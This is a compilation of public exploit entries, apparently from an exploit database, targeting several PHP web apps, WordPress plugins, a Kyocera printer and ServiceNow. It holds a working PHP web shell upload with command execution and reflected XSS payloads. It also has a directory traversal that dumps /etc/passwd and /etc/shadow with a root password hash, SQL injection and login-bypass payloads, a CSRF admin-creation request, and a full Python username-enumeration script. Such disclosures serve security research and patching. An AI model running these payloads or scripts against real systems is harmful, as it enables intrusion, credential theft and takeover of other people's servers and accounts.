# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux # Request sent as base user POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215 Content-Length: 769 Origin: http://localhost Connection: close Referer: http://localhost/hocms/admin/?page=system_info Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="name" Home Owners Collection Management System' -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="short_name" HOCMS - PHP -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="cover"; filename="cmd.php" Content-Type: application/x-php <?php if($_REQUEST['s']) { system($_REQUEST['s']); } else phpinfo(); ?> </pre> </body> </html> -----------------------------31935477191495174627236953215-- # Response HTTP/1.1 200 OK Date: Wed, 09 Feb 2022 09:32:16 GMT Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/8.1.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 
Connection: close Content-Type: text/html; charset=UTF-8 1 # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju Upgrade-Insecure-Requests: 1 # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Wed, 09 Feb 2022 09:39:06 GMT Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/8.1.2 Access-Control-Allow-Origin: * Content-Length: 33 Connection: close Content-Type: text/html; charset=UTF-8 0xSaudi </pre> </body> </html>
-
WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)
# Exploit Title: WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS) # Date: 2022-02-07 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/jetpack # Version: 9.1 # Tested on: Windows 11 # CVE: N/A 1. Description: This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert("BY Ex3ptionaL")</script>
-
WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
# Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS) # Date: 2022-02-07 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/contact-forms-builder/ # Version: 1.6.1 # Tested on: Windows 11 # CVE: N/A 1. Description: This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/code_generator.php?form_id=<script>alert('xss')</script>
-
Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) # Author: Luis Martinez # Discovery Date: 2022-02-10 # Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html # Tested Version: ECOSYS M2035dn (this is the printer model; the firmware / Command Center RX version of the tested unit is not recorded) # Tested on: Linux # Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated) # Proof of Concept: # 1.- Build a directory-traversal path below the static `/js/` directory; the embedded web server (`KM-MFP-http/V0.0.1`) resolves the `..` segments past the web root, as the ETag in the responses shows. # 2.- Append a URL-encoded null byte followed by an image extension (`%00.jpg`): the `.jpg` satisfies the static-file handler (note the `Content-Type: image/jpeg` on both responses) while the null byte presumably truncates the filename when the file is opened, so the real `/etc/passwd` / `/etc/shadow` is served. # 3.- Send the request with path normalisation disabled — browsers and most HTTP clients collapse `../` before sending, so use e.g. `curl --path-as-is` or a raw request from Burp Repeater. No authentication is needed. Note that Request 2 returns `/etc/shadow` including the root password hash (MD5-crypt, `$1$`), which can be cracked offline; treat disclosure of that file as full compromise of the device. Request 1: GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1 Cookie: rtl=0 Host: X.X.X.X Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Accept: */* Response 1: HTTP/1.1 200 OK Content-Length: 844 Upgrade: TLS/1.0 Accept-Encoding: identity Date: Thu, 10 Feb 2022 15:55:57 GMT Server: KM-MFP-http/V0.0.1 Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT" Content-Type: image/jpeg root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh adm:x:4:4:adm:/var/adm:/bin/sh lp:x:5:7:lp:/var/spool/lpd:/bin/sh sync:x:6:8:sync:/bin:/bin/sync shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown halt:x:8:10:halt:/sbin:/sbin/halt mail:x:9:11:mail:/var/mail:/bin/sh news:x:10:12:news:/var/spool/news:/bin/sh uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh operator:x:12:0:operator:/root:/bin/sh games:x:13:60:games:/usr/games:/bin/sh ftp:x:15:14:ftp:/var/ftp:/bin/sh man:x:16:20:man:/var/cache/man:/bin/sh www:x:17:18:www-data:/var/www:/bin/sh sshd:x:18:19:sshd:/var/run/sshd:/bin/sh proxy:x:19:21:proxy:/bin:/bin/sh telnetd:x:20:22:proxy:/bin:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh ais:x:101:101:ais:/var/run/ais:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Request 2: GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1 Cookie: rtl=0 Host: 
X.X.X.X Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Accept: */* Response 2: HTTP/1.1 200 OK Content-Length: 480 Upgrade: TLS/1.0 Accept-Encoding: identity Date: Thu, 10 Feb 2022 16:10:16 GMT Server: KM-MFP-http/V0.0.1 Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT" Content-Type: image/jpeg root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873:::::: bin:*:15873:::::: daemon:*:15873:::::: sys:*:15873:::::: adm:*:15873:::::: lp:*:15873:::::: sync:*:15873:::::: shutdown:*:15873:::::: halt:*:15873:::::: mail:*:15873:::::: news:*:15873:::::: uucp:*:15873:::::: operator:*:15873:::::: games:*:15873:::::: ftp:*:15873:::::: man:*:15873:::::: www:*:15873:::::: sshd:*:15873:::::: proxy:*:15873:::::: telnetd:*:15873:::::: backup:*:15873:::::: ais:*:15873:::::: nobody:*:15873::::::
-
Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)
# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 09.02.2022 ######## Description ######## # # # Log in to the admin panel, then open the user-management page (`/ajms/admin/?page=user/manage_user&id=<n>`). The `id` query parameter is used in a SQL query without sanitisation. The request below injects a time-based blind payload (`' AND (SELECT ... FROM (SELECT(SLEEP(10)))x) AND '...'='...`), so a response delayed by roughly ten seconds confirms the injection; from there the usual blind-extraction techniques (or sqlmap) apply. A valid authenticated PHPSESSID is required, hence "(Authenticated)". # # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa Upgrade-Insecure-Requests: 1
-
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Admin)
# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Admin) # Date: 2022-02-09 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://subrion.org # Software Link: https://subrion.org/download # Version: 4.2.1 # Tested on: Windows 10 # [ About - Subrion CMS ]: #Subrion is a PHP/MySQL based CMS & framework, #that allows you to build websites for any purpose, #Yes, from blog to corporate mega portal. # [ Description ]: # A CSRF vulnerability was reported in Subrion CMS 4.2.1: if a logged-in administrator can be made to submit the `panel/members/add/` form (for example through an auto-submitting HTML form on an attacker-controlled page), a new user is created with `usergroup_id=1` and `status=active`, which the title identifies as an administrator account. # Reviewer note: the sample request below is a same-origin submission captured from the victim's browser (note `Sec-Fetch-Site: same-origin`; a request launched from an attacker's page would carry `cross-site`) and it includes an `__st` field holding a 40-character per-session security token. For this to be exploitable cross-site the server must either not validate `__st` or the token must be predictable — this advisory does not show which, so confirm that before relying on it. The Cookie header is shown only because the capture came from the victim's session; in a real attack the browser attaches it automatically and the attacker never sees it. # [ Sample CSRF Request ]: POST /subrion/panel/members/add/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902 Content-Length: 2522 Origin: http://localhost Connection: close Referer: http://localhost/subrion/panel/members/add/ Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="__st" YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="username" Aryan -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="fullname" AryanChehreghani -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="email" aryanchehreghani@yahoo.com -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="_password" Test1234!
-----------------------------386122140640094420852486902 Content-Disposition: form-data; name="_password2" Test1234! -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="usergroup_id" 1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="website" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="phone" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="biography" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="facebook" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="twitter" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="gplus" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="linkedin" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="email_language" en -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="sponsored" 0 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="featured" 0 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="featured_end" 2022-03-09 12:03 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="status" active -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="save" 1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="goto" list -----------------------------386122140640094420852486902--
-
Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection # Date: 11/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Vulnerable Code: line 2 in file "mvogms/products/view_product.php" $qry = $conn->query("SELECT p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'"); # Root cause: `$_GET['id']` is interpolated straight into the SQL string, so a single quote in the parameter breaks out of the literal. Fix: bind it through a prepared statement (`$conn->prepare(... where p.id = ? ...)` with `bind_param('i', ...)`) or at minimum cast it with `(int)$_GET['id']`. # Sqlmap command: sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch # (note: --risk=3 also enables OR-based payloads that can alter data if the injected statement were an UPDATE/DELETE; it is harmless against this SELECT, but lower it when testing other parameters) # Output: Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=products/view_product&id=3' AND 9973=9973-- ogag Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ
-
Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
# Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass # Date: 11/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux # Vulnerable Code line 57 in file "/sqgs/Actions.php" @$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count']; # Note: the line quoted above is the username-uniqueness check (`$username` interpolated unescaped); the `a=login` handler exercised below is a separate query in the same file that is not quoted here — presumably built the same way, which is what makes the bypass work. Steps To Reproduce: * - Go to the login page http://localhost/sqgs/login.php Payload: username: admin ' or '1'='1'#-- password: any value (the original steps give `\`, the request below sends `0xsaudi`). The `#` turns the rest of the query into a comment, so if the login query is built like line 57 the password is never compared and its value does not matter. Proof of Concept : POST /sqgs/Actions.php?a=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 51 Origin: http://localhost Connection: close Referer: http://localhost/sqgs/login.php Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi
-
ServiceNow - Username Enumeration
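# Exploit Title: ServiceNow - Username Enumeration
# Google Dork: NA
# Date: 12 February 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2021-45901/
# Vendor Homepage: https://www.servicenow.com/
# Software Link: https://docs.servicenow.com/bundle/orlando-servicenow-platform/page/product/mid-server/task/t_DownloadMIDServerFiles.html
# Version: Orlando
# Tested on: MAC OSX
# CVE : CVE-2021-45901

#!/usr/local/bin/python3
# Author: Victor Hanna (SpiderLabs)
# User enumeration script SNOW
# Requires valid 1. JSESSION (anonymous), 2. X-UserToken and 3. CSRF Token
#
# How it works: the anonymous password-reset page ($pwd_reset.do) hands out a
# pwd_csrf_token; posting that token to xmlhttp.do as a
# PwdAjaxVerifyIdentity/verifyIdentity call answers differently for usernames
# that exist and for ones that do not, which is the oracle used below.
#
# Reviewed revision. Changes versus the original (behaviour otherwise kept):
#   * the target base URL can be given as argv[1] (default: TARGET) and the
#     Host / Origin / Referer headers are derived from it;
#   * a reset page without a pwd_csrf_token marker no longer crashes the loop
#     with an IndexError - the user is reported and skipped;
#   * missing bootstrap cookies give a clear message instead of a KeyError;
#   * the result file receives plain text (no ANSI colour codes) and is
#     flushed after every line, so an interrupted run keeps its results;
#   * the hard-coded "Content-Length: 786" header is dropped (requests
#     computes the real length and already overrode it) and the Referer typo
#     ("ss default") is fixed to match the x_referer value;
#   * transport errors other than a timeout are reported per user and the
#     scan continues, instead of being hidden behind a generic message.

import os
import sys
import time
import urllib.parse

import requests
from colorama import Fore, Style
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Base URL of the ServiceNow instance; argv[1] overrides it.
# NOTE: a plain http:// target sends the session cookie in clear text - use
# https:// wherever the instance offers it.
TARGET = "http://<redacted>/"

# Intercepting proxy the original always routed through (Burp on 8080).
# Set to None to talk to the target directly.
PROXIES = {
    "http": "http://127.0.0.1:8080/",
    "https": "http://127.0.0.1:8080/",
}

USER_LIST = "users.txt"              # one candidate username per line
RESULT_FILE = "enumeratedUserList.txt"
REQUEST_DELAY = 2                    # seconds between identity checks (rate limiting / lockout)

USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0"

# Identifiers of the password-reset process / identity processor on the tested
# Orlando instance; they are sent verbatim, as in the original request.
PROCESS_ID = "c6b0c20667100200a5a0f3b457415ad5"
PROCESSOR_ID = "fb9b36b3bf220100710071a7bf07390b"


def banner():
    """Print the tool banner; the usage line mentions the optional target URL."""
    print("[+]********************************************************************************[+]")
    print("| Author : Victor Hanna (9lyph)[" + Fore.RED + "SpiderLabs" + Style.RESET_ALL + "]\t\t\t\t\t |")
    print("| Description: SNOW Username Enumerator |")
    print("| Usage : " + sys.argv[0] + " [target-base-url] |")
    print("| Prerequisite: '" + USER_LIST + "' needs to contain list of users |")
    print("[+]********************************************************************************[+]")


def _millis_now() -> str:
    """Current time in milliseconds as a string - the value __CJ_g_startTime carries."""
    # ns -> ms by dropping the last six digits, exactly as the original did.
    return str(time.time_ns())[:-6]


def _cookie_header(jsessionid: str, glide_user_route: str, start_ms: str) -> str:
    """Build the Cookie header in the shape the original sent.

    The literal single quotes around the __CJ_g_startTime value are
    intentional - they are what the original put on the wire.
    """
    return (f"glide_user_route={glide_user_route}; JSESSIONID={jsessionid}; "
            f"__CJ_g_startTime='{start_ms}'")


def _extract_csrf_token(page: str):
    """Return the pwd_csrf_token value found in the reset page, or None.

    None means the marker is absent (reset disabled, session rejected, ...);
    the caller skips the user instead of crashing on an IndexError as the
    original did.
    """
    marker = page.find("pwd_csrf_token")
    if marker == -1:
        return None
    # Fixed offsets relative to the marker, carried over from the original
    # script; they depend on the exact markup of this ServiceNow release.
    # NOTE(review): a regex on the actual attribute would be more robust -
    # confirm the markup before changing it.
    token = page[marker + 45:marker + 73]
    return token or None


def _classify(response_text: str) -> bool:
    """Map the verifyIdentity response body to True (user exists) / False.

    Heuristic inherited from the original: a "500" anywhere in the body
    means unknown user, otherwise a "200" means known user; anything else
    is treated as unknown.
    NOTE(review): this is a plain substring match and will misfire on bodies
    that merely contain those digits - tighten it to the real status field
    once the response format is confirmed.
    """
    if "500" in response_text:
        return False
    return "200" in response_text


def _fetch_csrf_token(reset_url: str, host: str, jsessionid: str,
                      glide_user_route: str, start_ms: str):
    """GET the password-reset page and return its pwd_csrf_token (or None).

    Transport errors propagate to the caller.
    """
    headers = {
        "Host": host,
        "User-Agent": USER_AGENT,
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Cookie": _cookie_header(jsessionid, glide_user_route, start_ms),
    }
    page = requests.get(reset_url, headers=headers, timeout=20,
                        verify=False, proxies=PROXIES)
    return _extract_csrf_token(page.text)


def _verify_identity(ajax_url: str, host: str, base_url: str, jsessionid: str,
                     glide_user_route: str, token: str, user: str) -> str:
    """POST the PwdAjaxVerifyIdentity check for `user` and return the body text.

    Sleeps REQUEST_DELAY seconds first, as the original did, to keep the
    request rate low. Transport errors propagate to the caller.
    """
    headers = {
        "Host": host,
        "User-Agent": USER_AGENT,
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        # Original had "ss default" (space) here; the x_referer field below
        # uses "ss_default", which is the real page name.
        "Referer": base_url + "$pwd_reset.do?sysparm_url=ss_default",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Origin": base_url,
        "Connection": "keep-alive",
        # Content-Length is left to requests; the original's fixed 786 was
        # overwritten by the library anyway.
        "Cookie": _cookie_header(jsessionid, glide_user_route, _millis_now()),
    }
    data = {
        "sysparm_processor": "PwdAjaxVerifyIdentity",
        "sysparm_scope": "global",
        "sysparm_want_session_messages": "true",
        "sysparm_name": "verifyIdentity",
        "sysparm_process_id": PROCESS_ID,
        "sysparm_processor_id_0": PROCESSOR_ID,
        "sysparm_user_id_0": user,
        "sysparm_identification_number": "1",
        # sic: "sysparam", not "sysparm" - this is the field name the
        # original sent and the server accepted; do not "correct" it.
        "sysparam_pwd_csrf_token": token,
        "ni.nolog.x_referer": "ignore",
        "x_referer": "$pwd_reset.do?sysparm_url=ss_default",
    }
    # safe=":+" mirrors the original: ':' and '+' stay unencoded in the body.
    body = urllib.parse.urlencode(data, safe=":+")
    time.sleep(REQUEST_DELAY)
    response = requests.post(ajax_url, headers=headers, data=body, timeout=20,
                             verify=False, proxies=PROXIES)
    return response.text


def main():
    """Bootstrap an anonymous session, then probe every username in USER_LIST.

    Each verdict is printed (coloured) and appended as plain text to
    RESULT_FILE. Exits with status 1 when the target or proxy is unreachable,
    when the bootstrap response lacks the session cookies, or when USER_LIST
    is missing.
    """
    os.system("clear")
    banner()

    base_url = sys.argv[1] if len(sys.argv) > 1 else TARGET
    if not base_url.endswith("/"):
        base_url += "/"
    host = urllib.parse.urlsplit(base_url).netloc

    # 1. Anonymous session: the instance sets JSESSIONID and glide_user_route
    #    on the first unauthenticated request.
    try:
        bootstrap = requests.get(base_url, timeout=10, verify=False, proxies=PROXIES)
    except requests.exceptions.Timeout:
        print("[!] Connection to host timed out !")
        sys.exit(1)
    except requests.exceptions.ProxyError:
        print("[!] Can't communicate with proxy !")
        sys.exit(1)

    try:
        jsessionid = bootstrap.cookies["JSESSIONID"]
        glide_user_route = bootstrap.cookies["glide_user_route"]
    except KeyError as missing:
        print(f"[!] Bootstrap response did not set the {missing} cookie; is this a ServiceNow instance?")
        sys.exit(1)
    # One start time for every reset-page fetch, as in the original.
    session_start = _millis_now()

    try:
        with open(USER_LIST, "r") as user_file:
            usernames = [line.strip() for line in user_file if line.strip()]
    except FileNotFoundError:
        print(f"[!] '{USER_LIST}' not found; it must contain one username per line")
        sys.exit(1)

    reset_url = base_url + "$pwd_reset.do?sysparm_url=ss_default"
    ajax_url = base_url + "xmlhttp.do"

    print("[+] Brute forcing ....")
    with open(RESULT_FILE, "a+") as results:
        for user in usernames:
            try:
                token = _fetch_csrf_token(reset_url, host, jsessionid,
                                          glide_user_route, session_start)
                if token is None:
                    print(Fore.RED + f"[!] No pwd_csrf_token in reset page, skipping: {user}" + Style.RESET_ALL)
                    continue
                reply = _verify_identity(ajax_url, host, base_url, jsessionid,
                                         glide_user_route, token, user)
            except requests.exceptions.Timeout:
                print("[!] Connection to host timed out !")
                sys.exit(1)
            except requests.exceptions.RequestException as err:
                print(Fore.RED + f"[!] Request failed for {user}: {err}" + Style.RESET_ALL)
                continue

            if _classify(reply):
                line = f"[+] Valid user: {user}"
                colour = Fore.GREEN
            else:
                line = f"[-] Invalid user: {user}"
                colour = Fore.RED
            print(colour + line + Style.RESET_ALL)
            # Plain text in the file (no colour codes); flush so Ctrl-C keeps it.
            results.write(line + "\n")
            results.flush()


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        sys.exit()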